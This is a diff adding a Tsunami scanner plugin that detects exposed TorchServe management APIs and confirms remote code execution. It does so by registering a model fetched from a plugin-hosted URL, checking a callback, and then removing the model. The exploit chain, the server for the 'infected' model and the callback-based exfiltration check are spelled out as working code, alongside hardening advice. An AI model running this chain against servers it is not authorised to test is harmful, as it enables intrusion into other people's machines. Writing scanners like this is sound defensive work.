"minWorkers": 1, + // "maxWorkers": 1, + // "batchSize": 1, + // "maxBatchDelay": 100, + // "loadedAtStartup": false, + // "workers": [ + // { + // "id": "9029", + // "startTime": "2023-12-18T22:50:13.994Z", + // "status": "READY", + // "memoryUsage": 227737600, + // "pid": 1719, + // "gpu": false, + // "gpuUsage": "N/A" + // } + // ], + // "customizedMetadata": "" + // } + // ] + HttpHeaders header = HttpHeaders.builder().addHeader(headerName, headerValue).build(); + HttpUrl url = + targetUrl + .newBuilder() + .addPathSegment("models") + .addPathSegment(modelName) + .addQueryParameter("customized", "true") + .build(); + + try { + JsonObject response = + sendHttpRequestGetJsonArray(HttpMethod.GET, url, header).get(0).getAsJsonObject(); + String result = response.get("customizedMetadata").getAsString(); + return result; + } catch (NullPointerException | ClassCastException e) { + return null; + } + } + + /** + * Constructs the target URL for a given network service. + * + *

This method builds the root URL for a web application based on the provided network service + * details, typically used as the base URL for further API interactions. + * + * @param service The network service for which the URL is being constructed. + * @return The constructed HttpUrl object for the network service. + */ + private HttpUrl buildTargetUrl(NetworkService service) { + return HttpUrl.parse(NetworkServiceUtils.buildWebApplicationRootUrl(service)); + } + + /** + * Generates a callback URL for Tsunami's payload generator. + * + *

This method configures and generates a payload for Tsunami's callback server, typically used + * in SSRF vulnerability testing. The callback URL is used to verify if an external interaction + * with the Tsunami server occurs, indicating a successful SSRF exploit. + * + * @return The generated callback URL for the Tsunami payload. + */ + private String getTsunamiCallbackUrl() { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build(); + this.payload = this.payloadGenerator.generate(config); + return this.payload.getPayload(); + } + + private boolean checkTsunamiCallbackUrl() { + this.details.callbackVerification = this.payload != null && this.payload.checkIfExecuted(); + return this.details.callbackVerification; + } + + /** + * Checks whether the specified target URL corresponds to a TorchServe management API. + * + *

This method sends a GET request to the target URL to retrieve the API description. It then + * checks if the response matches the expected signature of a TorchServe management API. + * + * @param targetUrl The URL of the target service to be checked. + * @return True if the target URL is a TorchServe management API, false otherwise. + * @throws IOException If a network error occurs during the HTTP request. + */ + private boolean isTorchServe(HttpUrl targetUrl) throws IOException { + try { + JsonObject response = + sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "api-description"); + return response != null && isTorchServeResponse(response); + } catch (IOException e) { + logger.atSevere().withCause(e).log("Error checking if target is TorchServe"); + throw e; + } + } + + /** + * Determines if the given response matches the expected signature of a TorchServe API. + * + *

Analyzes the JSON structure of the response to verify if it contains key elements that match + * the TorchServe API's characteristics, such as the API title and the presence of specific + * operation IDs. + * + * @param response The JSON object representing the HTTP response to analyze. + * @return True if the response matches the expected TorchServe signature, false otherwise. + */ + private boolean isTorchServeResponse(JsonObject response) { + // Expected JSON structure + // { + // "openapi": "3.0.1", + // "info": { + // "title": "TorchServe APIs", + // "description": "TorchServe is a flexible and easy to use tool for serving deep learning + // models", + // "version": "0.8.1" + // }, + // "paths": { + // "/models": { + // "post": { + // "description": "Register a new model in TorchServe.", + // "operationId": "registerModel", + String apiTitle = getNestedKey(response, "info", "title"); + String registerModel = getNestedKey(response, "paths", "/models", "post", "operationId"); + + return response.has("openapi") + && apiTitle != null + && apiTitle.equals("TorchServe APIs") + && registerModel != null + && registerModel.equals("registerModel"); + } + + /** + * Retrieves a nested key value from a JSON object. + * + *

This method navigates through a JSON object using a sequence of keys to retrieve the final + * value. It is primarily used for extracting specific data from complex JSON structures. + * + * @param object The JSON object from which to extract the value. + * @param keys A sequence of keys used to navigate to the desired value in the JSON object. + * @return The string value of the nested key, or null if the key does not exist or is not a + * string. + */ + private @Nullable String getNestedKey(JsonObject object, String... keys) { + try { + // Traverse the JSON object until the last key - expect JsonObject at every step + for (int i = 0; i < keys.length - 1; i++) { + object = object.getAsJsonObject(keys[i]); + } + + // Return the value of the last key - expect it to be a String + return object.get(keys[keys.length - 1]).getAsString(); + } catch (NullPointerException | ClassCastException e) { + return null; + } + } + + /** + * Generates a unique model name that does not already exist on the target TorchServe server. + * + *

This method retrieves a list of existing model names from the target server and generates a + * new, random model name that is not in that list. + * + * @param targetUrl The URL of the TorchServe server to check for existing model names. + * @return A unique model name. + * @throws IOException If a network error occurs during the HTTP request. + */ + private String getModelName(HttpUrl targetUrl) throws IOException { + // get the list of models from the target + List models = getModelNames(targetUrl); + this.details.models = models; + + return generateRandomModelName(models); + } + + /** + * Generates a random model name that is not present in the provided list of existing models. + * + *

This method generates a random string and ensures that this string is not already used as a + * model name on the target server. + * + * @param existingModels A list of model names that already exist on the server. + * @return A randomly generated, unique model name. + */ + private String generateRandomModelName(List existingModels) { + String modelName; + do { + modelName = randomUtils.getRandomValue(); + } while (existingModels.contains(modelName)); + return modelName; + } + + /** + * Retrieves a list of model names from the TorchServe server. + * + *

Sends a GET request to the target server's API to fetch the list of currently loaded models. + * Note: Handles pagination to retrieve all models if more than the default page limit. + * + * @param targetUrl The URL of the TorchServe server. + * @return A list of model names present on the server. + * @throws IOException If a network error occurs during the HTTP request. + */ + private List getModelNames(HttpUrl targetUrl) throws IOException { + // get the list of models from the target + List models = new ArrayList<>(); + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); + if (response == null) return models; + + // TODO: there's pagination with default limit of 100 models per page + // https://github.com/pytorch/serve/blob/master/docs/management_api.md#list-models + // + // Expected JSON structure: + // "models": [ + // { + // "modelName": "squeezenet1_1", + // "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar" + // }, + + try { + JsonArray modelsArray = response.getAsJsonArray("models"); + for (JsonElement model : modelsArray) { + models.add(model.getAsJsonObject().get("modelName").getAsString()); + } + } catch (NullPointerException | ClassCastException e) { + // No models found, we'll return an empty list + } + return models; + } + + /** + * Removes a model from the TorchServe server by its name. + * + *

This method sends a DELETE request to the server's API to remove a model specified by its + * name. + * + * @param targetUrl The URL of the TorchServe server. + * @param modelName The name of the model to be removed. + * @throws IOException If a network error occurs during the HTTP request. + */ + private void removeModelByName(HttpUrl targetUrl, String modelName) throws IOException { + sendHttpRequestGetJsonObject(HttpMethod.DELETE, targetUrl, "models", modelName); + } + + /** + * Removes a model from the TorchServe server by its URL. + * + *

Retrieves the list of models from the server and searches for a model with the specified + * URL. If found, it uses the model's name to remove it from the server. + * + * @param targetUrl The URL of the TorchServe server. + * @param url The URL of the model to be removed. + */ + private void removeModelByUrl(HttpUrl targetUrl, String url) { + try { + // Get the list of models from the target + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); + + // Look for the model with the specified URL and remove it + JsonArray modelsArray = response.getAsJsonArray("models"); + for (JsonElement model : modelsArray) { + JsonObject modelObject = model.getAsJsonObject(); + if (modelObject.get("modelUrl").getAsString().equals(url)) { + String modelName = modelObject.get("modelName").getAsString(); + removeModelByName(targetUrl, modelName); + } + } + } catch (NullPointerException | ClassCastException | IOException e) { + // No models, nothing to remove + } + } + + /** + * Starts the web server and serves the exploit file. + * + *

This method initiates the web server bound to a specified host and port, and serves an + * exploit file located at a given URL. It is used in LOCAL exploitation mode to host the exploit + * payload. + * + * @param modelName The name of the model to be used in the exploit file's name. + * @return The URL where the exploit file is served. + * @throws IOException If an error occurs while starting the web server. + */ + private String serveExploitFile(String modelName) throws IOException { + this.webServer.start(this.details.localBindHost, this.details.localBindPort); + HttpUrl baseUrl = + HttpUrl.parse(this.details.localAccessibleUrl) + .newBuilder() + .addPathSegment(modelName + ".mar") + .build(); + return baseUrl.toString(); + } + + /** + * Executes the exploit against the target TorchServe service. + * + *

Constructs and sends an HTTP POST request to add a new model to the TorchServe service. The + * response is analyzed to determine if the model registration was successful, indicating a + * potential exploit. + * + * @param targetUrl The URL of the target TorchServe service. + * @param exploitUrl The URL of the exploit payload. + * @param modelName The name of the model to register. + * @return True if the exploit execution led to successful model registration, false otherwise. + * @throws IOException If a network error occurs during the HTTP request. + */ + private boolean executeExploit(HttpUrl targetUrl, String exploitUrl, String modelName) + throws IOException { + HttpUrl url = + targetUrl + .newBuilder() + .addPathSegment("models") + .addEncodedQueryParameter("url", exploitUrl) + .addQueryParameter("batch_size", "1") + .addQueryParameter("initial_workers", "1") + .addQueryParameter("synchronous", "true") + .addQueryParameter("model_name", modelName) + .build(); + this.details.targetUrl = targetUrl.toString(); + this.details.exploitUrl = exploitUrl; + + // Remove any existing models with the same URL + removeModelByUrl(targetUrl, exploitUrl); + + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.POST, url); + if (response == null) return false; + + // Expected response (200): + // + // { "status": "Model \"squeezenet1_1\" Version: 1.0 registered with 1 initial workers" } + // + // Expected response (500): + // { + // "code": 500, + // "type": "InternalServerException", + // "message": "Model file already exists squeezenet1_1.mar" + // } + String message = getNestedKey(response, "status"); + if (message == null) return false; + + return message.contains("registered with 1 initial workers"); + } + + /** + * Performs cleanup operations after exploit execution. + * + *

This method removes the added model from the TorchServe service and stops the web server. It + * is essential for reverting changes made during the exploitation process to maintain a clean + * state. + */ + private void cleanupExploit() { + if (this.details.modelName == null || this.details.targetUrl == null) return; + + try { + removeModelByName(HttpUrl.parse(this.details.targetUrl), this.details.modelName); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to cleanup exploit"); + this.details.cleanupFailed = true; + } + + this.webServer.stop(); + } + + /** + * Sends an HTTP request and returns the response as a JsonObject. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response as a JsonObject, or null if the response is not a valid JSON object. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonObject sendHttpRequestGetJsonObject( + HttpMethod method, HttpUrl baseUrl, String... pathSegments) throws IOException { + return sendHttpRequestGetJson(method, baseUrl, null, pathSegments).getAsJsonObject(); + } + + /** + * Sends an HTTP request and returns the response as a JsonArray. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param headers The HTTP headers to include in the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response as a JsonArray, or null if the response is not a valid JSON array. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonArray sendHttpRequestGetJsonArray( + HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments) + throws IOException { + return sendHttpRequestGetJson(method, baseUrl, headers, pathSegments).getAsJsonArray(); + } + + /** + * Sends an HTTP request and returns the response body as a JsonElement. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param headers The HTTP headers to include in the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response body as a JsonElement, or null if the response body is not valid JSON. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonElement sendHttpRequestGetJson( + HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments) + throws IOException { + if (headers == null) { + headers = HttpHeaders.builder().build(); + } + + HttpUrl url = baseUrl; + if (pathSegments.length > 0) { + url = url.newBuilder().addPathSegments(String.join("/", pathSegments)).build(); + } + + HttpRequest request = + HttpRequest.builder().setHeaders(headers).setMethod(method).setUrl(url).build(); + HttpResponse response = this.httpClient.send(request); + + return response + .bodyJson() + .orElseThrow(() -> new IOException("Couldn't parse response body as JSON")); + } + + /** + * Pretty prints a JSON string. + * + *

Formats a given JSON string to a more readable form with proper indentation. If the input + * string is not valid JSON, it returns the original string. + * + * @param json The JSON string to be pretty printed. + * @return The pretty-printed version of the JSON string, or the original string if it's not valid + * JSON. + */ + private String prettyPrintJson(String json) { + try { + Gson gson = new GsonBuilder().setPrettyPrinting().create(); + JsonParser jp = new JsonParser(); + JsonElement je = jp.parse(json); + return gson.toJson(je); + } catch (JsonParseException e) { + return json; + } + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java new file mode 100644 index 000000000..ea0d0e7eb --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java @@ -0,0 +1,86 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.common.flogger.GoogleLogger; +import com.sun.net.httpserver.HttpExchange; +import com.sun.net.httpserver.HttpServer; +import java.io.IOException; +import java.io.InputStream; +import java.io.OutputStream; +import java.net.InetSocketAddress; + +public class TorchServeManagementAPIExploiterWebServer { + private HttpServer httpServer; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + public void start(String hostname, int port) throws IOException { + try { + httpServer = HttpServer.create(new InetSocketAddress(hostname, port), 0); + httpServer.setExecutor(null); // sets the executor to null to use the default executor + httpServer.createContext("/", this::handleRequest); // creates a context with a handler + httpServer.start(); + logger.atInfo().log("Web server started on %s:%d", hostname, port); + } catch (IOException e) { + logger.atSevere().withCause(e).log("IO Exception starting web server"); + throw e; + } catch (Exception e) { + logger.atWarning().withCause(e).log("Error starting web server"); + throw e; + } + } + + private void handleRequest(HttpExchange exchange) throws IOException { + String requestMethod = exchange.getRequestMethod(); + logger.atInfo().log("Received %s request", requestMethod); + + if ("GET".equals(requestMethod)) { + serveModelFile(exchange); + } else { + logger.atWarning().log("Unsupported request method: %s", requestMethod); + exchange.sendResponseHeaders(405, -1); // Method Not Allowed + } + exchange.close(); + } + + private void serveModelFile(HttpExchange exchange) throws IOException { + try (InputStream is = getClass().getClassLoader().getResourceAsStream("model.mar")) { + if (is == null) { + logger.atSevere().log("Model file not found"); + exchange.sendResponseHeaders(404, -1); // Not Found + return; + } + + byte[] zipContent = is.readAllBytes(); + exchange.getResponseHeaders().add("Content-Type", "application/zip"); + exchange.sendResponseHeaders(200, zipContent.length); + + try (OutputStream os = exchange.getResponseBody()) { + os.write(zipContent); + } + } catch (IOException e) { + logger.atSevere().withCause(e).log("Error serving model file"); + exchange.sendResponseHeaders(500, -1); // Internal Server Error + } + } + + public void stop() { + if (httpServer != null) { + httpServer.stop(0); + logger.atInfo().log("Web server stopped"); + } + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java new file mode 100644 index 000000000..6fb80c3ef --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java @@ -0,0 +1,62 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.beust.jcommander.Parameter; +import com.beust.jcommander.Parameters; +import com.google.tsunami.common.cli.CliOption; + +@Parameters(separators = "=") +public class TorchServeManagementApiArgs implements CliOption { + // Default mode is SSRF, which uses regular Tsunami Callback server to confirm vulnerability. + // Note that it does not observe the code execution on the target directly. + @Parameter( + names = "--torchserve-management-api-mode", + description = + "Exploitation mode used to confirm vulnerability [auto (default), basic, ssrf, static," + + " local]") + public String exploitationMode; + + // Static mode requires an infected model to be hosted on a static URL. + @Parameter( + names = "--torchserve-management-api-model-static-url", + description = "Static URL of the infected model, to be added to TorchServe.") + public String staticUrl; + + // Local mode means the plugin will attempt to serve an infected model directly. Bind host + // and port indicate where plugin will bind the HTTP server to, accessible URL is the URL + // of the server from the outside. + @Parameter( + names = "--torchserve-management-api-local-bind-host", + description = "Path to the infected model, to be added to TorchServe.") + public String localBindHost; + + @Parameter( + names = "--torchserve-management-api-local-bind-port", + description = "Port to bind the local TorchServe instance to.") + public int localBindPort; + + @Parameter( + names = "--torchserve-management-api-local-accessible-url", + description = "URL of the local TorchServe instance accessible from the outside.") + public String localAccessibleUrl; + + @Override + public void validate() { + // Nothing to do here, because we need to merge the config with the CLI args and it cannot be + // done here. + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java new file mode 100644 index 000000000..de4fbae12 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java @@ -0,0 +1,34 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.tsunami.common.config.annotations.ConfigProperties; + +@ConfigProperties("plugins.doyensec.torchserve") +public class TorchServeManagementApiConfig { + // --torchserve-management-api-mode + public String exploitationMode = "auto"; + + // --torchserve-management-api-model-static-url + public String staticUrl; + + // --torchserve-management-api-local-bind-host + public String localBindHost; + // --torchserve-management-api-local-bind-port + public int localBindPort; + // --torchserve-management-api-local-accessible-url + public String localAccessibleUrl; +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java new file mode 100644 index 000000000..ddf59db0e --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java @@ -0,0 +1,174 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.base.Preconditions.checkNotNull; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.proto.AdditionalDetail; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TextData; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "TorchServeManagementApiDetector", + version = "0.1", + description = "Detects publicly available TorchServe management API with a path to RCE.", + author = "Andrew Konstantinov (andrew@doyensec.com)", + bootstrapModule = TorchServeManagementApiDetectorBootstrapModule.class) +@ForWebService +public final class TorchServeManagementApiDetector implements VulnDetector { + private final TorchServeExploiter torchServeExploiter; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + public static final String REPORT_PUBLISHER = "DOYENSEC"; + public static final String REPORT_ID = "TORCHSERVE_MANAGEMENT_API_RCE"; + public static final String REPORT_TITLE = "TorchServe Management API Remote Code Execution"; + public static final String REPORT_RECOMMENDATION = + "It is strongly recommended to restrict access to the TorchServe Management API, as " + + "public exposure poses significant security risks. The API allows potentially " + + "disruptive interactions with TorchServe, including modifying configurations, " + + "deleting models, and altering resource allocation, which could lead to Denial of " + + "Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of unauthorized code " + + "execution through model uploads. Users must ensure strict control over model " + + "creation to prevent unauthorized or malicious use. Implementing the 'allowed_urls' " + + "option in TorchServe's configuration is critical in this regard. This setting, " + + "detailed at https://pytorch.org/serve/configuration.html#:~:text=allowed_urls, " + + "limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure 'allowed_urls' as a comma-separated list of " + + "regular expressions that specifically allow only trusted sources. General " + + "whitelisting of large domains (such as entire AWS S3 or GCP buckets) is not " + + "secure. Care must be taken to ensure regex patterns are accurately defined " + + "(e.g., using 'https://models\\.my-domain\\.com/*' instead of " + + "'https://models.my-domain.com/*' to prevent unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original URLs of " + + "downloaded models. Attackers could exploit this information to identify " + + "vulnerable download sources or to host malicious models on similarly-named " + + "domains."; + private final Clock utcClock; + + @Inject + public TorchServeManagementApiDetector( + TorchServeExploiter torchServeExploiter, @UtcClock Clock utcClock) { + this.utcClock = checkNotNull(utcClock); + this.torchServeExploiter = checkNotNull(torchServeExploiter); + } + + /** + * Detects vulnerabilities in the given target. Called by Tsunami that handles the port scanning + * and service fingerprinting. + * + * @param targetInfo Information about the target system. + * @param matchedServices List of matched network services. + * @return A list of detection reports. + */ + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + DetectionReportList.Builder reportListBuilder = DetectionReportList.newBuilder(); + + for (NetworkService service : matchedServices) { + try { + TorchServeExploiter.Details details = torchServeExploiter.isServiceVulnerable(service); + logger.atInfo().log("Checking service %s", service); + if (details != null) { + logger.atInfo().log("Found vulnerable service %s", service); + DetectionReport report = buildDetectionReport(targetInfo, service, details); + reportListBuilder.addDetectionReports(report); + } + } catch (Exception e) { + logger.atWarning().withCause(e).log("Error processing service %s", service); + } + } + return reportListBuilder.build(); + } + + /** Builds a vulnerability object. */ + private Vulnerability buildVulnerability(TorchServeExploiter.Details details) { + VulnerabilityId vulnerabilityId = + VulnerabilityId.newBuilder().setPublisher(REPORT_PUBLISHER).setValue(REPORT_ID).build(); + return Vulnerability.newBuilder() + .setTitle(REPORT_TITLE) + .setDescription(details.generateDescription()) + .setRecommendation(REPORT_RECOMMENDATION) + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder().setText(details.generateAdditionalDetails()).build()) + .build()) + .setSeverity(details.getSeverity()) + .setMainId(vulnerabilityId) + .build(); + } + + /** + * Builds a detection report for a given target and service. + * + * @param targetInfo Information about the target. + * @param service The network service associated with the vulnerability. + * @return The constructed detection report. + */ + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService service, TorchServeExploiter.Details details) { + Vulnerability vulnerability = buildVulnerability(details); + return buildDetectionReport(targetInfo, service, vulnerability, details.isVerified()); + } + + /** + * Builds a detection report for a given target, service and vulnerability. + * + * @param targetInfo + * @param service + * @param vulnerability + * @return The constructed detection report. + */ + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, + NetworkService service, + Vulnerability vulnerability, + boolean verified) { + DetectionReport report = + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus( + verified + ? DetectionStatus.VULNERABILITY_VERIFIED + : DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability(vulnerability) + .build(); + return report; + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java new file mode 100644 index 000000000..9141e1a78 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java @@ -0,0 +1,27 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** A {@link PluginBootstrapModule} for {@link TorchServeManagementApiDetector}. */ +public final class TorchServeManagementApiDetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(TorchServeManagementApiDetector.class); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java new file mode 100644 index 000000000..6e2412c58 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java @@ -0,0 +1,47 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import java.security.MessageDigest; +import java.util.UUID; + +public class TorchServeRandomUtils { + public String getRandomValue() { + return UUID.randomUUID().toString(); + } + + /** + * Compares the provided hash with the MD5 hash of the given value. + * + * @param hash The hash to compare against the expected MD5 hash. + * @param randomValue The value used for generating the expected MD5 hash. + * @return True if the provided hash matches the MD5 hash of the given value, false otherwise. + */ + public boolean validateHash(String hash, String randomValue) { + try { + MessageDigest md = MessageDigest.getInstance("MD5"); + md.update(randomValue.getBytes()); + byte[] digest = md.digest(); + StringBuilder sb = new StringBuilder(); + for (byte b : digest) { + sb.append(String.format("%02x", b)); + } + return sb.toString().equals(hash); + } catch (Exception e) { + throw new RuntimeException(e); + } + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json b/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json new file mode 100644 index 000000000..af9a33a7c --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json @@ -0,0 +1,12 @@ +{ + "runtime": "python", + "model": { + "modelName": "tsunami-torch-rce-validator", + "serializedFile": "serialized.pt", + "handler": "model.py", + "modelVersion": "1.0" + }, + "modelServerVersion": "1.0", + "implementationVersion": "1.0", + "specificationVersion": "1.0" +} diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py b/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py new file mode 100644 index 000000000..9e27f2323 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py @@ -0,0 +1,79 @@ +#!/usr/bin/env python + +# Copyright 2023 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +This Python script is part of a vulnerability detection plugin for Google's Tsunami Security Scanner. +The plugin is designed to assess the Remote Code Execution (RCE) capability of systems by deploying +this script as a model in TorchServe. It handles specific HTTP request headers to simulate various +actions without creating additional attack surface. The script's behaviors include: + +- Calculating an MD5 hash for the 'tsunami-execute' header value to simulate command execution. +- Sending a GET request to a specified URL in the 'tsunami-callback' header to validate data exfiltration. +- Collecting basic system information in response to the 'tsunami-info' header for aiding vulnerability mitigation. +- Logging the value of the 'tsunami-log' header to the container's standard output. + +This script is a part of an automated testing process and does not perform any malicious activities. +In case of unexpected termination of the Tsunami plugin, this script may remain on the system. To verify +its origin and purpose, please refer to the following repositories: + +- Tsunami Security Scanner: https://github.com/google/tsunami-security-scanner +- Tsunami RCE Plugin for TorchServe: 